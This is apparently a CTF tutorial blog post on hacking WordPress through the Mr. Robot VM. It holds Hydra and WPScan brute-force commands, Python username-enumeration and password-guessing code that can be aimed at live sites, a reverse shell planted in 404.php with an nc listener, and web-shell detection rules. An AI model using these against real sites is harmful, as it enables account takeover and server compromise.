How to hack a WordPress Website

Welcome back fellow security enthusiasts! Today I will show you how to hack a WordPress website using the Mr. Robot CTF as an example. I have just worked through this excellent CTF myself and learned a ton in the process. I wanted to level up my web vulnerability analysis game a notch and started with this CTF.

A CTF is a so-called Capture the Flag game, where your goal is to collect a certain number of flags (or keys). CTFs are used to practice your hacking skills in a safe and legal environment. I can recommend Vulnhub as a resource for a selection of excellent CTFs.

Ok, let’s get started.


Step 1 – Evaluating if a Website is using WordPress

If you don't know whether a website is using WordPress, there is usually a very easy way to find out.

You can simply type: www.addressofthewebsite.com/wp-admin

In most cases this redirects you to the wp-login.php login form, unless the admin has restricted or moved it (there are plugins that rename the login URL or limit /wp-admin to certain IP addresses).

Another great way to check whether a website is running WordPress is WPScan. WPScan comes pre-installed in both Kali and ParrotSec.

wpscan --url http://www.addressofyourtarget.com

(Older WPScan 2.x releases took the target as -u; the 3.x versions shipped with current Kali use --url.)

In my case, scanning the Mr. Robot VM reveals the following.

[Screenshot: a snippet of the WPScan results]


As you can see, it clearly identifies the site as WordPress. It also lists 46 vulnerabilities, but be aware of what that number means: WPScan matches the detected core, theme and plugin versions against its vulnerability database, it does not verify that any of them are actually exploitable on this host. WordPress itself does nothing to stop a scan like this, but many hosters put a WAF in front of the site that blocks or rate-limits scanners (often just by user agent), and a patched installation will simply produce far fewer matches. An outdated, unprotected install like this VM is where you get output like the above.

Ok, so far so good. Now we can confirm that by checking whether the login page exists, by navigating to the website URL + /wp-admin like so:

[Screenshot: the WordPress login page]

And sure enough, the login form comes up.
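The checks in Step 1 can be automated. The following Python function is an added example written for this article, not the author's tooling or WPScan's code: it takes the status code, headers and body of one response (from /wp-admin or the front page) and reports whether it looks like WordPress and which version it leaks, using the redirect to wp-login.php, the REST API Link header, the X-Pingback header, the generator meta tag and the ?ver= query on core scripts. The sample responses at the bottom are constructed for the demo; the 192.168.1.109 address is the VM's from this article and the 4.9.8 version string is made up.

```python
import re
from typing import Dict, List, Optional

# Markers WordPress leaves in HTTP headers and HTML. The sample responses at
# the bottom are constructed for this example, not captured from the VM.
GENERATOR_RE = re.compile(
    r"""<meta\s+name=["']generator["']\s+content=["']WordPress(?:\s+([\d.]+))?["']""",
    re.IGNORECASE,
)
# Core scripts are loaded with ?ver=<core version> unless the site strips it.
CORE_VER_RE = re.compile(r"""/wp-includes/[^"'\s]*\?ver=([\d.]+)""")
PATH_MARKERS = ("/wp-content/", "/wp-includes/", "/wp-json/")


def fingerprint_wordpress(status: int, headers: Dict[str, str], body: str) -> Dict[str, object]:
    """Return {'is_wordpress', 'version', 'evidence'} for one HTTP response."""
    evidence: List[str] = []
    version: Optional[str] = None
    h = {k.lower(): v for k, v in headers.items()}

    # Anonymous requests to /wp-admin/ are bounced to wp-login.php (Step 1).
    if status in (301, 302) and "wp-login.php" in h.get("location", ""):
        evidence.append("redirect to wp-login.php")
    # REST API discovery link (WordPress 4.4+) and the pingback header.
    if 'rel="https://api.w.org/"' in h.get("link", ""):
        evidence.append("Link header advertises the REST API")
    if h.get("x-pingback", "").endswith("xmlrpc.php"):
        evidence.append("X-Pingback header points at xmlrpc.php")

    m = GENERATOR_RE.search(body)
    if m:
        evidence.append("meta generator tag")
        version = m.group(1)
    for marker in PATH_MARKERS:
        if marker in body:
            evidence.append(f"asset path {marker}")
    if version is None:
        # Fallback when a hardening plugin removed the generator tag.
        mv = CORE_VER_RE.search(body)
        if mv:
            version = mv.group(1)
            evidence.append("?ver= on a wp-includes asset")

    return {"is_wordpress": bool(evidence), "version": version, "evidence": evidence}


# --- constructed sample responses (status, headers, body) ---------------------
FRONT_PAGE = (
    200,
    {"Link": '<http://192.168.1.109/wp-json/>; rel="https://api.w.org/"',
     "X-Pingback": "http://192.168.1.109/xmlrpc.php"},
    '<html><head><meta name="generator" content="WordPress 4.9.8" />'
    '<script src="/wp-includes/js/wp-embed.min.js?ver=4.9.8"></script></head></html>',
)
# Same page with the generator tag removed, as a hardening plugin would do.
FRONT_PAGE_NO_GENERATOR = (
    200, {},
    '<html><head><script src="/wp-includes/js/wp-embed.min.js?ver=4.9.8"></script></head></html>',
)
WP_ADMIN_REDIRECT = (
    302,
    {"Location": "http://192.168.1.109/wp-login.php?redirect_to=http%3A%2F%2F192.168.1.109%2Fwp-admin%2F&reauth=1"},
    "",
)
NOT_WORDPRESS = (200, {"Server": "nginx"}, "<html><body>Hello</body></html>")


if __name__ == "__main__":
    for name, resp in [("front page", FRONT_PAGE), ("no generator tag", FRONT_PAGE_NO_GENERATOR),
                       ("/wp-admin/", WP_ADMIN_REDIRECT), ("plain site", NOT_WORDPRESS)]:
        print(name, fingerprint_wordpress(*resp))
```

To use it against a live host, fetch the page with a client that does not follow redirects (the 302 from /wp-admin is itself evidence) and pass status, headers and body in. Absence of all markers is not proof of absence: a site with the generator tag stripped, a rewritten login URL and a CDN in front of its assets will come back empty, which is why WPScan tries several more fingerprints.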


Step 2 – Capturing the Login Request with Burp Suite

Now comes the difficult part: finding the username. You could start with admin, but the installer lets the owner pick any name and many sites use something other than admin, so you may need to do some further research on the target. What helps us is that wp-login.php answers with a different error for a nonexistent username than for a wrong password, so once we know exactly how the form is submitted we can test candidate names without knowing any password.

In the Mr. Robot example, I know that the username is Elliot (not too hard to guess). You could also try to run Hydra against a couple of username lists, but first we need to use Burp Suite to capture the login request so we know the exact form fields.

Start Burp Suite by typing (sudo is not actually required on Kali, it runs fine as a normal user)

sudo burpsuite

Create a new Temporary Project using the Burp defaults.

Navigate to the Target -> Scope tab and click on Add to include the wp-login page in the scope. Select Yes in the pop-up dialog.

[Screenshot: adding the site to the scope]


Next, go to the Preferences Menu of Firefox and scroll all the way down until you find Network Proxy. Click on Settings.

Select Manual proxy configuration and enter the IP 127.0.0.1 and the port 8080. Tick “Use this proxy server for all protocols”. Click OK.

[Screenshot: adding a proxy in Firefox]

Back to Burp Suite. Open the Proxy tab and make sure Intercept is on. Now back to the wp-login page. Enter any random username and password and click Log In. Make sure Privacy Badger, uBlock Origin and NoScript are disabled for the site, otherwise they may block or alter the request.

Once you have clicked Log In, go back to Burp Suite and look at the intercepted request.

[Screenshot: the intercepted POST request in Burp Suite]

log=root&pwd=1234&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.1.109%2Fwp-admin%2F&testcookie=1


Now we have what we need to feed to Hydra: the form is POSTed to /wp-login.php, the username goes in the log field and the password in the pwd field.


Step 3 – Finding the correct Username

Let's have a little bit of fun to give you an idea of how you could find a username for your target. The VM we are using for this example, as mentioned above, is Mr. Robot themed, so it's very likely that the username will be found in some trivia that has to do with Mr. Robot.

First go back to Burp Suite and close it. We don't need it anymore right now. Also go back to your Firefox proxy settings and disable the proxy again.

Now I head to the Mr. Robot Wikipedia page: https://en.wikipedia.org/wiki/Mr._Robot

And I will create a username list from this exact page using CeWL.

Open a new Terminal Window and type

cewl -w usernames.txt -d 1 -m 4 https://en.wikipedia.org/wiki/Mr._Robot

(No sudo needed, CeWL only writes to your working directory.)

Let’s break this down.

  • -w usernames.txt – the name of the wordlist that will be created
  • -d 1 – the depth to which CeWL follows links from the start page (the default is 2). 0 means only the page you named, 1 means that page plus every page it links to directly. On a Wikipedia article, 1 already pulls in hundreds of linked pages, so use 0 if you only want words from this article.
  • -m 4 – the minimum length of a word to be put in the list; it filters out the short noise words
  • https://en.wikipedia.org/wiki/Mr._Robot – the page we are going to crawl

So as you see, you could apply this technique to any target relevant website.
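To make the -d and -m flags concrete, here is an added Python example (not part of the original post and not CeWL's own code) that does what CeWL does, on a tiny fake site held in a dictionary so it runs offline: it strips tags, script and style, collects words of at least min_len characters, and follows links up to depth hops. The three pages and their text are constructed for the demo; username_candidates() is a small extra that lower-cases and de-duplicates the result for Hydra's -L option.

```python
import re
from html.parser import HTMLParser
from typing import Dict, List, Set


class _TextAndLinks(HTMLParser):
    """Collect visible text and href targets, ignoring <script> and <style> bodies."""

    def __init__(self) -> None:
        super().__init__()
        self.text: List[str] = []
        self.links: List[str] = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
        elif tag == "a":
            for key, value in attrs:
                if key == "href" and value:
                    self.links.append(value)

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.text.append(data)


WORD_RE = re.compile(r"[A-Za-z][A-Za-z'-]*")


def crawl_words(site: Dict[str, str], start: str, depth: int, min_len: int) -> List[str]:
    """What `cewl -d <depth> -m <min_len> <start>` does, over an in-memory site.

    site maps URL -> HTML and stands in for the live web. depth 0 visits only
    the start page, depth 1 also the pages it links to, and so on; links to
    URLs not in `site` (off-site links) are skipped. Words come back unique,
    in first-seen order, with their original capitalisation, like CeWL's.
    """
    seen: Set[str] = set()
    words: List[str] = []
    frontier = [start]
    visited = {start}
    for _hop in range(depth + 1):
        next_frontier: List[str] = []
        for url in frontier:
            html = site.get(url)
            if html is None:
                continue
            parser = _TextAndLinks()
            parser.feed(html)
            for word in WORD_RE.findall(" ".join(parser.text)):
                if len(word) >= min_len and word not in seen:
                    seen.add(word)
                    words.append(word)
            for link in parser.links:
                if link not in visited:
                    visited.add(link)
                    next_frontier.append(link)
        frontier = next_frontier
    return words


def username_candidates(words: List[str]) -> List[str]:
    """Lower-cased, de-duplicated list for Hydra -L (WordPress logins are case-insensitive)."""
    return sorted({w.lower() for w in words})


# --- constructed three-page site for the demo ---------------------------------
START = "/wiki/Mr._Robot"
SITE = {
    START: (
        "<html><head><title>Mr. Robot</title><style>.x{color:red}</style></head><body>"
        "<p>Mr. Robot follows Elliot Alderson, a cybersecurity engineer.</p>"
        "<a href='/wiki/Rami_Malek'>Rami Malek</a> <a href='/wiki/fsociety'>fsociety</a>"
        "<a href='https://example.org/offsite'>elsewhere</a>"
        "<script>var tracking = 'ignoreme';</script></body></html>"
    ),
    "/wiki/Rami_Malek": "<html><body><p>Rami Malek plays Elliot.</p>"
                        "<a href='/wiki/Mr._Robot'>back</a></body></html>",
    "/wiki/fsociety": "<html><body><p>fsociety is a hacker group led by Mr. Robot.</p></body></html>",
}


if __name__ == "__main__":
    for depth in (0, 1):
        print(f"-d {depth}:", crawl_words(SITE, START, depth, 4))
    print("candidates:", username_candidates(crawl_words(SITE, START, 1, 4)))
```

Running it shows why the depth matters: depth 0 yields only the words on the article itself, depth 1 also pulls in the linked pages (here "plays", "back", "hacker", "group"), while the script and style content never makes it into the list.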

Running a quick

ls

shows us that our usernames.txt was created.

[Screenshot: checking the CeWL output]


WPScan can often enumerate usernames directly (from author archive pages, the REST API at /wp-json/wp/v2/users, and the login error messages), so always try this too:

wpscan --url http://www.targetwebsite.com --enumerate u

Now we are going to use Hydra to Bruteforce this list against the wp-login page.


Step 4 – Brute Forcing Usernames with Hydra

Alright, time to feed the usernames to our Hydra. I found this particular method on one of the many walkthroughs from Vulnhub, although I don't remember exactly which one it was, but I give credit where credit is due. Open a new terminal window and type:

hydra -V -L usernames.txt -p whatever 192.168.1.109 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

Let's break this down.

  • -V – verbose, print every attempt
  • -L usernames.txt – our list of candidate usernames
  • -p whatever – a single fixed password; we don't care about it because we only want to find out the username
  • http-post-form – the Hydra module for HTML login forms
  • /wp-login.php – the path to the login form
  • log=^USER^&pwd=^PASS^&wp-submit=Log+In – the POST body we captured in Burp Suite, where ^USER^ and ^PASS^ are placeholders that Hydra fills from the -L and -p options
  • F=Invalid username – tells Hydra that an attempt failed if the response contains this string. This works because WordPress gives a different error for a wrong password on an existing account ("The password you entered for the username ... is incorrect"), so any response without the failure string counts as a hit. Newer WordPress versions say "Unknown username" instead, so check the actual error text in Burp Suite before you run Hydra and adjust the F= string if necessary.

Alright, let’s run that command, shall we?


[Screenshot: Hydra results]


And sure enough, we get told that the login with the username elliot was successful. It wasn't, of course: Hydra only reports that the response for elliot did not contain "Invalid username", which means the account exists and it was the password that was wrong.

So we still need to figure out the password. But at least we have a username.


Step 5 – Brute Forcing the Password

Now we could also use Hydra to brute force the user's password, but I prefer using WPScan as the syntax is easier.

gunzip /usr/share/wordlists/rockyou.txt.gz
wpscan --url http://192.168.1.109/ --usernames elliot --passwords /usr/share/wordlists/rockyou.txt

Note that --url takes the site root, not wp-login.php, and the wordlist has to be uncompressed first. These are the WPScan 3.x flags; the older 2.x versions used --username and --wordlist. WPScan 3 picks the attack method automatically and will go through xmlrpc.php when it is enabled (faster, and it looks different in the server logs); --password-attack wp-login forces it through the login form instead.

rockyou.txt is just an example, replace it with whatever password list you want to use.

And voila, we have the username and the password.

[Screenshot: WPScan capturing the password]
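The two steps above, username enumeration through the login error oracle (Step 4) and password brute forcing against a confirmed username (Step 5), in Python, as an added example rather than code from the original post, Hydra or WPScan. The classifier works on any (status, headers, body) triple. fake_wp_login is a constructed stand-in for http://192.168.1.109/wp-login.php with a made-up password so the demo runs offline; http_poster shows how to point the same functions at a real form with the third-party requests library (an assumption, not used by the demo) and sends the same fields as the Burp capture, including the test cookie WordPress insists on when testcookie=1 is posted.

```python
from typing import Callable, Dict, Iterable, List, Optional, Tuple

# A response reduced to (status, headers, body) so the classifier works on a
# real HTTP library's response as well as on the offline stub further down.
Response = Tuple[int, Dict[str, str], str]
Poster = Callable[[str, str], Response]


def classify_login(resp: Response) -> str:
    """Map a wp-login.php reply to 'success', 'no_such_user', 'bad_password' or 'unknown'.

    WordPress answers a failed login with HTTP 200 and an error box whose text
    depends on whether the username exists. That difference is the oracle the
    Hydra command in Step 4 relies on (F=Invalid username). A successful login
    is a 302 to /wp-admin/ that sets the wordpress_logged_in_* cookie.
    """
    status, headers, body = resp
    if status == 302 and "wordpress_logged_in_" in headers.get("Set-Cookie", ""):
        return "success"
    # "Invalid username" on older cores, "Unknown username" / "Unknown email
    # address" on newer ones: the account does not exist.
    if any(s in body for s in ("Invalid username", "Unknown username", "Unknown email")):
        return "no_such_user"
    if "The password you entered for the username" in body:
        return "bad_password"
    return "unknown"


def enumerate_users(post: Poster, candidates: Iterable[str]) -> List[str]:
    """Step 4: one login attempt per candidate with a throwaway password."""
    return [u for u in candidates if classify_login(post(u, "whatever")) == "bad_password"]


def brute_force_password(post: Poster, user: str, wordlist: Iterable[str],
                         max_attempts: int = 1000) -> Optional[str]:
    """Step 5: try passwords for a username that enumerate_users() confirmed.

    Stops at max_attempts, and as soon as the site answers with something the
    classifier does not recognise (lockout plugin, captcha, WAF block page).
    """
    for n, pw in enumerate(wordlist, 1):
        if n > max_attempts:
            break
        verdict = classify_login(post(user, pw))
        if verdict == "success":
            return pw
        if verdict == "unknown":
            break
    return None


def http_poster(login_url: str) -> Poster:
    """Wire the functions above to a live wp-login.php (same fields as the Burp capture).

    Uses the third-party 'requests' package, imported lazily so the offline demo
    does not need it. Only point this at systems you are authorised to test.
    """
    import requests  # type: ignore

    def post(user: str, password: str) -> Response:
        r = requests.post(login_url, allow_redirects=False, timeout=10,
                          data={"log": user, "pwd": password, "wp-submit": "Log In",
                                "redirect_to": login_url.replace("wp-login.php", "wp-admin/"),
                                "testcookie": "1"},
                          # without this cookie WordPress answers "Cookies are blocked"
                          cookies={"wordpress_test_cookie": "WP Cookie check"})
        return r.status_code, dict(r.headers), r.text
    return post


# --- constructed stub standing in for http://192.168.1.109/wp-login.php -------
# The credential is an assumption for the demo, not the VM's real password.
FAKE_ACCOUNTS = {"elliot": "mrrobot123"}


def fake_wp_login(user: str, password: str) -> Response:
    """Imitate wp-login.php's three outcomes (logins compare case-insensitively)."""
    key = user.lower()
    if key not in FAKE_ACCOUNTS:
        return 200, {}, '<div id="login_error"><strong>ERROR</strong>: Invalid username.</div>'
    if FAKE_ACCOUNTS[key] != password:
        return 200, {}, ('<div id="login_error"><strong>ERROR</strong>: The password you entered '
                         f'for the username <strong>{user}</strong> is incorrect.</div>')
    return 302, {"Location": "/wp-admin/", "Set-Cookie": "wordpress_logged_in_1a2b=elliot|..."}, ""


if __name__ == "__main__":
    users = enumerate_users(fake_wp_login, ["root", "admin", "Elliot", "Alderson"])
    print("valid usernames:", users)
    print("password:", brute_force_password(fake_wp_login, users[0],
                                            ["123456", "password", "mrrobot123"]))
```

The "unknown" verdict is the part worth copying into your own tooling: Hydra with a single F= string will happily report a lockout page or a WAF block as a successful login, because the failure string is missing from it. Classifying all three expected outcomes and stopping on anything else avoids that false positive.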



Step 6 – Injecting Malicious Code into WordPress

Alright, now that we have admin access to WordPress, there are a couple of ways we can go from here. I will show you one of the easier ones.

On your attacking computer go to Places -> File System -> usr -> share -> webshells -> php and open php-reverse-shell.php (on the command line that is /usr/share/webshells/php/php-reverse-shell.php, which Kali ships by default).

Copy all of its content:

[Screenshot: copying the text of php-reverse-shell.php]


Now in WordPress, navigate to Appearance -> Editor (called Theme File Editor in newer versions) and select the 404.php template. This is just an example, you can plant the code in many different ways, for instance by uploading a plugin zip. If the editor is missing altogether, the site owner has set DISALLOW_FILE_EDIT in wp-config.php, which is exactly the hardening that blocks this step.

Now paste your code in here so it looks something like this:

[Screenshot: the 404.php template with the pasted shell, lines to edit marked in yellow]

Edit the lines marked in yellow ($ip and $port near the top of the script) so the IP points to your attacking computer and choose a port, then save the file.


Step 7 – Starting a Netcat listener

Now back on the attacking computer, we start a Netcat listener on the port you put into the script (use sudo if it's below 1024):

nc -lvp 443

Then trigger the 404 template by requesting any page that doesn't exist on the target, e.g. www.yourtargetwebsite.com/404 (WordPress renders 404.php for every unknown URL, so the exact path doesn't matter).

[Screenshot: Netcat reporting the established connection]


And we are in! Not only did we hack the WordPress admin account, we also got a shell on the server itself. It runs as the web server's user (typically www-data), so from here you need to use your skills to gain elevated access, but that shouldn't be too hard anymore now.
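The flip side of Steps 6 and 7 is spotting a planted shell. This added Python example (written for this article, not from the original post) runs the two checks a defender or incident responder would apply to wp-content/themes: a content scan for PHP calls a template never needs (fsockopen() and proc_open() are what php-reverse-shell.php uses; eval() over decoded or request-supplied data covers most other web shells), and a hash comparison against a baseline taken from the clean theme. The theme files and the planted snippet are constructed for the demo and do not contain the real reverse shell script.

```python
import hashlib
import os
import re
import tempfile
from typing import Dict, Iterator, List, Tuple

# Calls a theme template has no business making. php-reverse-shell.php from
# /usr/share/webshells uses fsockopen() and proc_open(); other web shells lean
# on eval() over decoded or request-supplied input.
SUSPICIOUS = {
    "fsockopen": re.compile(r"\bfsockopen\s*\("),
    "proc_open": re.compile(r"\bproc_open\s*\("),
    "command_exec": re.compile(r"\b(?:shell_exec|exec|passthru|system|popen)\s*\("),
    "eval_decoded": re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\("),
    "eval_request": re.compile(r"\beval\s*\([^;]*\$_(?:GET|POST|REQUEST|COOKIE)\b"),
}


def _php_files(root: str) -> Iterator[Tuple[str, str]]:
    """Yield (relative path, full path) for every .php file under root."""
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                yield os.path.relpath(full, root).replace(os.sep, "/"), full


def scan_theme_dir(root: str) -> Dict[str, List[str]]:
    """Content check: map each .php file to the SUSPICIOUS rules it trips."""
    hits: Dict[str, List[str]] = {}
    for rel, full in _php_files(root):
        with open(full, encoding="utf-8", errors="replace") as fh:
            src = fh.read()
        matched = [name for name, rx in SUSPICIOUS.items() if rx.search(src)]
        if matched:
            hits[rel] = matched
    return hits


def hash_tree(root: str) -> Dict[str, str]:
    """Integrity check: sha256 of every .php file, taken once from a known-good install."""
    out: Dict[str, str] = {}
    for rel, full in _php_files(root):
        with open(full, "rb") as fh:
            out[rel] = hashlib.sha256(fh.read()).hexdigest()
    return out


def changed_files(baseline: Dict[str, str], current: Dict[str, str]) -> List[str]:
    """Files whose hash differs from the baseline, plus files the baseline never had."""
    return sorted(rel for rel, digest in current.items() if baseline.get(rel) != digest)


# --- constructed theme files for the demo -------------------------------------
CLEAN_404 = "<?php get_header(); ?>\n<h1><?php _e('Page not found'); ?></h1>\n<?php get_footer();\n"
CLEAN_INDEX = ("<?php get_header();\nwhile (have_posts()) { the_post(); the_content(); }\n"
               "get_footer();\n")
# Shaped like the top of php-reverse-shell.php after editing $ip/$port in Step 6;
# a stand-in written for this example, not the real script.
PLANTED_404 = CLEAN_404 + (
    "<?php\n$ip = '192.168.1.100'; $port = 443;\n"
    "$sock = fsockopen($ip, $port, $errno, $errstr, 30);\n"
    "$process = proc_open('/bin/sh -i', $descriptorspec, $pipes);\n"
)


def demo() -> Dict[str, object]:
    """Build a clean theme, baseline it, plant the shell in 404.php, run both checks."""
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "twentyfifteen")
        os.makedirs(theme)
        for name, body in (("index.php", CLEAN_INDEX), ("404.php", CLEAN_404),
                           ("style.css", "/* Theme Name: demo */")):
            with open(os.path.join(theme, name), "w") as fh:
                fh.write(body)
        baseline = hash_tree(root)                      # taken while the install is clean
        with open(os.path.join(theme, "404.php"), "w") as fh:  # the Step 6 edit
            fh.write(PLANTED_404)
        return {"suspicious": scan_theme_dir(root),
                "changed": changed_files(baseline, hash_tree(root))}


if __name__ == "__main__":
    print(demo())
```

The hash check is the more reliable of the two: a shell that obfuscates its function names slips past the content scan, but it cannot avoid changing the file, and WordPress itself logs nothing when the theme editor saves a template. Keep the baseline somewhere the web server's user cannot write to, otherwise the attacker who edited 404.php can edit the baseline too.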

You can see, CTFs are a great way to learn new stuff.

Until next time, keep on hacking!


*All the techniques provided in the tutorials on ceos3c.com are solely meant for educational purposes.
All of the techniques taught here are only meant to be used in a closed laboratory environment or with the consent of the other party.
If you are using any of those techniques for illegal purposes, Ceos3c can't be held responsible for possible legal consequences.
